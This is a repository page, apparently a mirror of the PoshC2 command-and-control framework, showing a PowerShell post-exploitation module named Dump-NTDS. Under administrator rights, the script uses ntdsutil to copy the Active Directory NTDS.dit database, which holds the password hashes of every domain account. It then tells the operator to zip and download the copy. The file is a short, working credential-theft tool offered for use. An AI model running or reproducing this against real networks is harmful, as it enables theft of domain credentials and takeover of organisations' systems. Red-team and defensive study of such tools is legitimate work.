infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
PoshC2_Python/Modules/Dump-NTDS.ps1

36 lines
1.0 KiB
PowerShell
Raw Permalink Normal View History

Initial Commit
2018-07-23 08:55:15 +00:00
<#
.Synopsis
Dumps the active directory dit using ntdsutil
.DESCRIPTION
Dumps the active directory dit using ntdsutil
.EXAMPLE
PS C:\>Dump-NTDS -EmptyFolder C:\Temp\NTDS\
#>
function Dump-NTDS
{
[cmdletbinding()]
Param
(
[string[]]$EmptyFolder
)
if( (Get-ChildItem $EmptyFolder | Measure-Object).Count -eq 0)
{
if (Test-Administrator) {
NTdsutil.exe "activate instance ntds" "ifm" "create full $($EmptyFolder) " "q" "q"
} else {
Write-Output "Not running in elevated mode - must run as administrator"
}
} else {
Write-Output "Folder is not empty, must use an empty folder"
}
Write-Output "If successfull, Zip the files and download using - New-ZipFile c:\temp\test.zip c:\temp\test\"
}
function Test-Administrator
{
$user = [Security.Principal.WindowsIdentity]::GetCurrent();
(New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
}